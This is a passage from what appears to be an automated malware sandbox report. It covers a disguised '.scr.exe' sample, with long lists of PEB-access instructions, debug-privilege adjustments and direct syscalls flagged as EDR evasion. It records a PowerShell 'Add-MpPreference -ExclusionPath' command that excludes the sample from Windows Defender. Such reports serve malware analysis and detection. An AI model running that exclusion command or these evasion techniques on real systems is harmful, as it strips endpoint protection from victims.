                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FCDF0 mov ecx, dword ptr fs:[00000030h]4_2_055FCDF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05654DD7 mov eax, dword ptr fs:[00000030h]4_2_05654DD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05654DD7 mov eax, dword ptr fs:[00000030h]4_2_05654DD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CCDEA mov eax, dword ptr fs:[00000030h]4_2_055CCDEA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CCDEA mov eax, dword ptr fs:[00000030h]4_2_055CCDEA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DADE0 mov eax, dword ptr fs:[00000030h]4_2_055DADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DADE0 mov eax, dword ptr fs:[00000030h]4_2_055DADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DADE0 mov eax, dword ptr fs:[00000030h]4_2_055DADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DADE0 mov eax, dword ptr fs:[00000030h]4_2_055DADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DADE0 mov eax, dword ptr fs:[00000030h]4_2_055DADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DADE0 mov eax, dword ptr fs:[00000030h]4_2_055DADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F0DE1 mov eax, dword ptr fs:[00000030h]4_2_055F0DE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05606DA0 mov eax, dword ptr fs:[00000030h]4_2_05606DA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05698DAE mov eax, dword ptr fs:[00000030h]4_2_05698DAE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05698DAE mov eax, dword ptr fs:[00000030h]4_2_05698DAE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A4DAD mov eax, dword ptr fs:[00000030h]4_2_056A4DAD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560CDB1 mov ecx, dword ptr fs:[00000030h]4_2_0560CDB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560CDB1 mov eax, dword ptr fs:[00000030h]4_2_0560CDB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560CDB1 mov eax, dword ptr fs:[00000030h]4_2_0560CDB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F8DBF mov eax, dword ptr fs:[00000030h]4_2_055F8DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F8DBF mov eax, dword ptr fs:[00000030h]4_2_055F8DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DAC50 mov eax, dword ptr fs:[00000030h]4_2_055DAC50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DAC50 mov eax, dword ptr fs:[00000030h]4_2_055DAC50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DAC50 mov eax, dword ptr fs:[00000030h]4_2_055DAC50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DAC50 mov eax, dword ptr fs:[00000030h]4_2_055DAC50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DAC50 mov eax, dword ptr fs:[00000030h]4_2_055DAC50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055DAC50 mov eax, dword ptr fs:[00000030h]4_2_055DAC50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D6C50 mov eax, dword ptr fs:[00000030h]4_2_055D6C50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D6C50 mov eax, dword ptr fs:[00000030h]4_2_055D6C50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D6C50 mov eax, dword ptr fs:[00000030h]4_2_055D6C50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05604C59 mov eax, dword ptr fs:[00000030h]4_2_05604C59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0566CC20 mov eax, dword ptr fs:[00000030h]4_2_0566CC20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0566CC20 mov eax, dword ptr fs:[00000030h]4_2_0566CC20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05674C34 mov eax, dword ptr fs:[00000030h]4_2_05674C34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05674C34 mov eax, dword ptr fs:[00000030h]4_2_05674C34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05674C34 mov eax, dword ptr fs:[00000030h]4_2_05674C34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05674C34 mov eax, dword ptr fs:[00000030h]4_2_05674C34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05674C34 mov eax, dword ptr fs:[00000030h]4_2_05674C34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05674C34 mov eax, dword ptr fs:[00000030h]4_2_05674C34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05674C34 mov ecx, dword ptr fs:[00000030h]4_2_05674C34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0C00 mov eax, dword ptr fs:[00000030h]4_2_055E0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0C00 mov eax, dword ptr fs:[00000030h]4_2_055E0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0C00 mov eax, dword ptr fs:[00000030h]4_2_055E0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055E0C00 mov eax, dword ptr fs:[00000030h]4_2_055E0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560CC00 mov eax, dword ptr fs:[00000030h]4_2_0560CC00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05654C0F mov eax, dword ptr fs:[00000030h]4_2_05654C0F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CEC20 mov eax, dword ptr fs:[00000030h]4_2_055CEC20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055C8CD0 mov eax, dword ptr fs:[00000030h]4_2_055C8CD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05602CF0 mov eax, dword ptr fs:[00000030h]4_2_05602CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05602CF0 mov eax, dword ptr fs:[00000030h]4_2_05602CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05602CF0 mov eax, dword ptr fs:[00000030h]4_2_05602CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05602CF0 mov eax, dword ptr fs:[00000030h]4_2_05602CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CCCC8 mov eax, dword ptr fs:[00000030h]4_2_055CCCC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564CCA0 mov ecx, dword ptr fs:[00000030h]4_2_0564CCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564CCA0 mov eax, dword ptr fs:[00000030h]4_2_0564CCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564CCA0 mov eax, dword ptr fs:[00000030h]4_2_0564CCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0564CCA0 mov eax, dword ptr fs:[00000030h]4_2_0564CCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055C8C8D mov eax, dword ptr fs:[00000030h]4_2_055C8C8D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680CB5 mov eax, dword ptr fs:[00000030h]4_2_05680CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680CB5 mov eax, dword ptr fs:[00000030h]4_2_05680CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680CB5 mov eax, dword ptr fs:[00000030h]4_2_05680CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680CB5 mov eax, dword ptr fs:[00000030h]4_2_05680CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680CB5 mov eax, dword ptr fs:[00000030h]4_2_05680CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680CB5 mov eax, dword ptr fs:[00000030h]4_2_05680CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680CB5 mov eax, dword ptr fs:[00000030h]4_2_05680CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680CB5 mov eax, dword ptr fs:[00000030h]4_2_05680CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680CB5 mov eax, dword ptr fs:[00000030h]4_2_05680CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680CB5 mov eax, dword ptr fs:[00000030h]4_2_05680CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680CB5 mov eax, dword ptr fs:[00000030h]4_2_05680CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680CB5 mov eax, dword ptr fs:[00000030h]4_2_05680CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05680CB5 mov eax, dword ptr fs:[00000030h]4_2_05680CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F8CB1 mov eax, dword ptr fs:[00000030h]4_2_055F8CB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F8CB1 mov eax, dword ptr fs:[00000030h]4_2_055F8CB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A4F68 mov eax, dword ptr fs:[00000030h]4_2_056A4F68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05672F60 mov eax, dword ptr fs:[00000030h]4_2_05672F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05672F60 mov eax, dword ptr fs:[00000030h]4_2_05672F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CCF50 mov eax, dword ptr fs:[00000030h]4_2_055CCF50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CCF50 mov eax, dword ptr fs:[00000030h]4_2_055CCF50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CCF50 mov eax, dword ptr fs:[00000030h]4_2_055CCF50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CCF50 mov eax, dword ptr fs:[00000030h]4_2_055CCF50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CCF50 mov eax, dword ptr fs:[00000030h]4_2_055CCF50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CCF50 mov eax, dword ptr fs:[00000030h]4_2_055CCF50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05654F40 mov eax, dword ptr fs:[00000030h]4_2_05654F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05654F40 mov eax, dword ptr fs:[00000030h]4_2_05654F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05654F40 mov eax, dword ptr fs:[00000030h]4_2_05654F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05654F40 mov eax, dword ptr fs:[00000030h]4_2_05654F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05674F42 mov eax, dword ptr fs:[00000030h]4_2_05674F42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560CF50 mov eax, dword ptr fs:[00000030h]4_2_0560CF50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FAF69 mov eax, dword ptr fs:[00000030h]4_2_055FAF69
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FAF69 mov eax, dword ptr fs:[00000030h]4_2_055FAF69
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05670F50 mov eax, dword ptr fs:[00000030h]4_2_05670F50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D2F12 mov eax, dword ptr fs:[00000030h]4_2_055D2F12
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05686F00 mov eax, dword ptr fs:[00000030h]4_2_05686F00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FEF28 mov eax, dword ptr fs:[00000030h]4_2_055FEF28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560CF1F mov eax, dword ptr fs:[00000030h]4_2_0560CF1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CEFD8 mov eax, dword ptr fs:[00000030h]4_2_055CEFD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CEFD8 mov eax, dword ptr fs:[00000030h]4_2_055CEFD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055CEFD8 mov eax, dword ptr fs:[00000030h]4_2_055CEFD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A4FE7 mov eax, dword ptr fs:[00000030h]4_2_056A4FE7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D2FC8 mov eax, dword ptr fs:[00000030h]4_2_055D2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D2FC8 mov eax, dword ptr fs:[00000030h]4_2_055D2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D2FC8 mov eax, dword ptr fs:[00000030h]4_2_055D2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D2FC8 mov eax, dword ptr fs:[00000030h]4_2_055D2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05610FF6 mov eax, dword ptr fs:[00000030h]4_2_05610FF6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05610FF6 mov eax, dword ptr fs:[00000030h]4_2_05610FF6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05610FF6 mov eax, dword ptr fs:[00000030h]4_2_05610FF6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05610FF6 mov eax, dword ptr fs:[00000030h]4_2_05610FF6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05686FF7 mov eax, dword ptr fs:[00000030h]4_2_05686FF7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560CF80 mov eax, dword ptr fs:[00000030h]4_2_0560CF80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05602F98 mov eax, dword ptr fs:[00000030h]4_2_05602F98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05602F98 mov eax, dword ptr fs:[00000030h]4_2_05602F98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05650E7F mov eax, dword ptr fs:[00000030h]4_2_05650E7F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05650E7F mov eax, dword ptr fs:[00000030h]4_2_05650E7F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05650E7F mov eax, dword ptr fs:[00000030h]4_2_05650E7F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A2E4F mov eax, dword ptr fs:[00000030h]4_2_056A2E4F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056A2E4F mov eax, dword ptr fs:[00000030h]4_2_056A2E4F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D6E71 mov eax, dword ptr fs:[00000030h]4_2_055D6E71
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055C8E1D mov eax, dword ptr fs:[00000030h]4_2_055C8E1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05666E20 mov eax, dword ptr fs:[00000030h]4_2_05666E20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05666E20 mov eax, dword ptr fs:[00000030h]4_2_05666E20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05666E20 mov ecx, dword ptr fs:[00000030h]4_2_05666E20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FAE00 mov eax, dword ptr fs:[00000030h]4_2_055FAE00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055FAE00 mov eax, dword ptr fs:[00000030h]4_2_055FAE00
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe"
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe"Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Maps a DLL or memory area into another process
